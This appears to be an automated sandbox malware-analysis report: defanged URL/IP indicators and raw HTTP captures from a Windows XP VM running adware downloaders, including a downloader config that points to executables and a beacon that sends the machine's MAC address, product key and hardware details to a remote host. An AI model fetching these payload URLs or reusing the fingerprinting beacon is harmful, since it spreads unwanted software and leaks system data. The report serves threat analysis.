hxxp://dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe	183.57.48.18
hxxp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe	183.57.48.18
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9	87.245.198.83
hxxp://www.meiheitou.com/View/Home/Task/css.base.css?1.0.247	123.249.21.126
hxxp://www.meiheitou.com/?89-sd--ant-	123.249.21.126
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot?	123.249.21.126
hxxp://www.meiheitou.com/Public/jquery/1.11.3/jquery.min.js?1.0.247	123.249.21.126
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl	23.43.133.163
hxxp://tj.9158.com/Opendownloadernewxml.aspx?softlist=&lmarkid=88	87.245.198.83
hxxp://cdn.daicuo.cc/dc.base/1.0.3/css/base.min.css?1.0.247	58.215.177.195
hxxp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158	87.245.198.83
hxxp://17990.vicp.net/1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5	119.28.13.101
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9	87.245.198.83
hxxp://dlsw.br.baidu.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe	118.123.210.46
hxxp://tj.9158.com/temp/downloaderico/main.ico	87.245.198.83
hxxp://www.meiheitou.com/Public/html5shiv/3.7.2/html5shiv.min.js	123.249.21.126
hxxp://www.meiheitou.com/Public/images/sns_qq.png	123.249.21.126
hxxp://download.suxiazai.com/for_down/2013/install1393485.exe	183.131.11.165
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247	123.249.21.126
hxxp://www.meiheitou.com/View/Home/Task/css.task.css?1.0.247	123.249.21.126
hxxp://conf.a101.cc/tool/install.txt	211.101.15.220
hxxp://c.pc.qq.com/fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301	103.7.30.157
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247	123.249.21.126
hxxp://www.meiheitou.com/View/Home/Task//base.js?1.0.247	123.249.21.126
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028	112.90.83.106
hxxp://www.meiheitou.com/Public/respond/1.4.2/respond.min.js	123.249.21.126
hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif	151.249.89.135
hxxp://at.alicdn.com/t/font_1415073294_4967172.eot?	188.254.86.250
acc.p2sp.baidu.com	123.125.113.35
jh.01lm.com	87.245.198.75
web2.51.la	222.187.225.123
cmp2s.p2sp.baidu.com	123.125.65.117
s.p2sp.baidu.com	123.125.113.30
master.etl.desktop.qq.com	140.207.69.49
stat.p2sp.baidu.com	61.135.162.189
down.appkhh.com	222.186.129.21
media.p2sp.baidu.com	220.181.57.155
acctrack.kuaibo.com	115.231.216.36

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 131

Connection: Keep-Alive

.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008542120341062666110713

Server: Apache

tracecode: 00008542120341062666110713

Set-Cookie: BAIDUID=32F3C5706F8B2402545910D9A50FD25A:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 114

Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ

..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016772320341062666110713

Server: Apache

tracecode: 00016772320341062666110713

Set-Cookie: BAIDUID=69DAC83DF6D595A3CBDF2100CACB5A99:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /t/font_1415073294_4967172.eot? HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: at.alicdn.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/octet-stream

Content-Length: 18124

Connection: keep-alive

Date: Fri, 07 Nov 2014 08:45:51 GMT

Accept-Ranges: bytes

Access-Control-Allow-Origin: *

Cache-Control: max-age=31557600

ETag: "FA439E838DACE2C479FFB8A09AA20DC4"

Last-Modified: Tue, 04 Nov 2014 03:54:54 GMT

x-oss-request-id: 545C86BFC642146A2828D1BE

Via: cache15.l2de1[0,200-0,H], cache9.l2de1[0,0], cache10.ru1[0,200-0,H], cache8.ru1[2,0]

Age: 31522441

X-Cache: HIT TCP_HIT dirn:9:460901958

X-Swift-SaveTime: Fri, 03 Apr 2015 19:31:55 GMT

X-Swift-CacheTime: 18818036

Timing-Allow-Origin: *

.F...E............................LP....@....................G......................i.c.o.n.f.o.n.t.....M.e.d.i.u.m.....V.e.r.s.i.o.n. .1...0. .;. .t.t.f.a.u.t.o.h.i.n.t. .(.v.0...9.4.). .-.l. .8. .-.r. .5.0. .-.G. .2.0.0. .-.x. .1.4. .-.w. .".G.". .-.f. .-.s.....i.c.o.n.f.o.n.t................pFFTMm9..........OS/2W.t........`cmap.......x....cvt ...J..;\...$fpgm0.....;.....gasp......;T....glyf"qw.......3.head..@p..6....6hhea...@..6....$hmtxSW....7 ...lloca.<....7....@maxp...u..7.... name......7.....post......:....8prep...f..E..............=.......}.......}.............................3.....................@........PfEd...x...,.,.\.,................. .................................x...........x..""33DDUUffww.............x..""33DDUUffww..........................w.fs..........................................................................................................................................................................................................................................................................................................."...2.......)@&.......W.....K....O.....C............. 3.!.'3.#"........V".f.....,.........0.:.R.^.wK..PX@J........f......^.....\.......^.......^....i........X.........Y.....Q.....B.K..PX@K........f......^.....\........f.......^....i........X.........Y.....Q.....B.K..PX@L........f......^.....\........f........f....i........X.........Y.....Q.....B.@N........f.......f......d........f........f....i........X.........Y.....Q.....BYYY@(SS;;21..S^S^[X;R;RKC751:2

<<< skipped >>>

GET /pca3-g5.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: crl.verisign.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "2235a72ff18d351e39c5c63221752775:1442874344"

Last-Modified: Mon, 21 Sep 2015 22:25:43 GMT

Date: Sat, 07 Nov 2015 05:00:11 GMT

Content-Length: 533

Connection: keep-alive

Content-Type: application/pkix-crl

0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..150917000000Z..151231235959Z0...*.H................v'....{....."W*<../w...Bj.....H......ll..%..Y&.HtQ...}...F.{>..3.[..z.H...W../.3.Y.C.t....S{^.A.....G...^...YI.[..N.y..........p.....;....x6z..i7..0...lS$..h.#.9%[.,.1..1....3.....h;<...........W%....doi~..e6G........w........{c..............j.Em.....i.HTTP/1.1 200 OK..Server: Apache..ETag: "2235a72ff18d351e39c5c63221752775:1442874344"..Last-Modified: Mon, 21 Sep 2015 22:25:43 GMT..Date: Sat, 07 Nov 2015 05:00:11 GMT..Content-Length: 533..Connection: keep-alive..Content-Type: application/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..150917000000Z..151231235959Z0...*.H................v'....{....."W*<../w...Bj.....H......ll..%..Y&.HtQ...}...F.{>..3.[..z.H...W../.3.Y.C.t....S{^.A.....G...^...YI.[..N.y..........p.....;....x6z..i7..0...lS$..h.#.9%[.,.1..1....3.....h;<...........W%....doi~..e6G........w........{c..............j.Em.....i...

<<< skipped >>>

POST /query?cmd=validurl HTTP/1.1

Content-Length: 96

Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:11 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117694860581376522110713

Server: Apache

tracecode: 00117694860581376522110713

Set-Cookie: BAIDUID=2C7B1E2C3C0DA057D1ED518AD3390542:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe HTTP/1.1

Host: 203.205.148.185

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: CDN_NWS_4.2.1

Connection: keep-alive

Date: Sat, 07 Nov 2015 04:59:59 GMT

Cache-Control: max-age=600

Expires: Sat, 07 Nov 2015 05:09:59 GMT

Last-Modified: Wed, 13 May 2015 09:18:00 GMT

Content-Type: application/octet-stream

Content-Length: 1489144

X-Cache-Lookup: Hit From Disktank

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0A..t ..t ..t ......u ..S...m ..S.... ..S...0 .../..u .../..e ..t ... ..S...) ..S...u ..S...u ..Richt ..........PE..L....P.......................`....................@.............................................................................x....@.. O..............`...........................................`V..@...............$............................text...1........................... ..`.rdata..N...........................@..@.data....n.......0..................@....rsrc... O...@...P..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

GET /u.php?id=89 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 123.shipinbus.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Sat, 07 Nov 2015 12:58:49 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.28

Location: hXXp://VVV.meiheitou.com/?89-sd--ant-

0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Sat, 07 Nov 2015 12:58:49 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.28..Location: hXXp://www.meiheitou.com/?89-sd--ant-..0..

GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: xui.ptlogin2.qq.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Connection: keep-alive

Keep-Alive: timeout=50, max=1024

Server: QZHTTP-2.38.20

Date: Sat, 07 Nov 2015 05:00:29 GMT

P3P: CP="CAO PSA OUR"

Cache-Control: max-age=604800

Set-Cookie: pt_local_token=-1924241393; PATH=/; DOMAIN=ptlogin2.qq.com;

Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT

Content-type: text/html

Content-Length: 5460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-height:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.btn_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:none;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-height:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style><script>var g_begTime=new Date();..(function(){...window.onerror = function(msg,url,line){....var reportUrl = location.protoco

<<< skipped >>>

GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: tj.9158.com

Connection: Keep-Alive

Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55

HTTP/1.1 200 OK

Date: Sat, 07 Nov 2015 05:00:29 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 948

X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)

Connection: keep-alive

..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body style=" margin:0px">.. <form name="form1" method="post" action="Downloaderconfig.aspx?imgtype=9158" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZGTU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="91FFCAD5" />..</div>.. <div>.. .. <object >.. .. <embed src="http://tj.9158.com/temp/flash/1.swf" width="490px" height="180px" quality="high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" ></embed>.. </object>.. .. </div>.. </form>..</body>..</html>....

GET /Opendownloadernewxml.aspx?softlist=&lmarkid=88 HTTP/1.1

User-Agent: DownloadInstall

Host: tj.9158.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 07 Nov 2015 05:00:15 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Set-Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55; path=/; HttpOnly

Cache-Control: private

Content-Type: text/html; charset=gb2312

Content-Length: 899

X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)

Connection: keep-alive

<?xml version="1.0" encoding="GB2312"?>..<config>...<Title>..........9158ktv</Title>...<XieyiUrl>hXXp://tj.9158.com/temp/provision/9158ktv.htm</XieyiUrl>...<AdvertUrl>http://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>...<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>...<ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>...<Icon>http://tj.9158.com/temp/downloaderico/main.ico</Icon>...<IconTips>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>...<Setuptime>20</Setuptime>...<ToolIcon>9158........</ToolIcon>...<Item>9158ktv</Item>...<Mtype>19</Mtype>...<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.html</ErrorUrl>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>..</config>......

<<< skipped >>>

GET /temp/downloaderico/main.ico HTTP/1.1

User-Agent: DownloadInstall

Host: tj.9158.com

Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55

HTTP/1.1 200 OK

Date: Sat, 07 Nov 2015 05:00:17 GMT

Content-Length: 17542

Content-Type: image/x-icon

Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT

Accept-Ranges: bytes

ETag: "c2a0b8c2b6a8ce1:6d64"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-Via: 1.1 fuzhou183:8111 (Cdn Cache Server V2.0), 1.1 db77:10 (Cdn Cache Server V2.0)

Connection: keep-alive

............ .h...F......... ......... .... .....6...00.... ..%......(....... ..... .........................p^...g...j..vT..vR...`...j...e..uH..vH...d...c...U..k?..eA..lU.*.g...........}...j...q...........]...c...........]..|P..qF..nL...d...............{...t...........m...u.......e...v...}......tK..z^...z...............}......D....h...p...d..xF...............^..x]...q...}..................C...c@...........................Q...n.......x...w..........X%...u..D....o...................p..f=...m...............k...k..W...l(..O...F................n..~]..lH...a...~...................o...p..g...O....|...............z..uT..vS..._...d...c...l..............\...]....................s..nO...^...u.......................m..X....M...............v..{a..dF...f...................]...]..c...R...o8...................{..qR...^...z.......]..............m1..L....c......................vX..wO...p......................Z...g/.......................t..rS..sI...........................i...........................v..hG..tK...f...........~.......................................d.._?..o\..pB..~D...C...D...M...N...L...N...R...Q...L...M..}K..iC..nX.'................................................................(.......0..... .............................p].4{c...g..uS..sO..sN..sM...d...d...c...]..qD..qD..rD..._...^...^...\..m@..g>..gF..mX.R....o].(.h...w.......z...a..._...]...s...|...z...v...S...R...X...u...t...t...c..yJ..qD..f:..d>..oZ.Myb...w...............|...n...l...v...............a..._...l..............._...W..}Q..uJ..vL..mM..y_..

<<< skipped >>>

GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1

User-Agent: DownloadInstall

Host: tj.9158.com

Cache-Control: no-cache

Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55

HTTP/1.1 200 OK

Date: Sat, 07 Nov 2015 05:00:23 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 1134

X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)

Connection: keep-alive

..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>......

GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1

User-Agent: DownloadInstall

Host: tj.9158.com

Cache-Control: no-cache

Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55

HTTP/1.1 200 OK

Date: Sat, 07 Nov 2015 05:00:28 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 1134

X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)

Connection: keep-alive

..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>......

GET /1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 17990.vicp.net

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Server: nginx

Date: Sat, 07 Nov 2015 04:59:45 GMT

Content-Type: text/html

Content-Length: 102

Connection: keep-alive

ETag: "550c2d1a-66"

POST /query?cmd=validurl HTTP/1.1

Content-Length: 125

Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:08 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00089320501911494410110713

Server: Apache

tracecode: 00089320501911494410110713

Set-Cookie: BAIDUID=DA04B4066DA68D7236FB11CB7AC286DA:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 102

Connection: Keep-Alive

.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991409270581376522110712

Server: Apache

tracecode: 35991409270581376522110712

Set-Cookie: BAIDUID=005B09C6D83A1A4B8CA6E1AA9F73D13D:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /dc.base/1.0.3/css/base.min.css?1.0.247 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn.daicuo.cc

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:58:41 GMT

Content-Type: text/css

Content-Length: 1691

Last-Modified: Thu, 16 Apr 2015 11:10:24 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "552f98a0-69b"

Expires: Sat, 07 Nov 2015 16:58:41 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

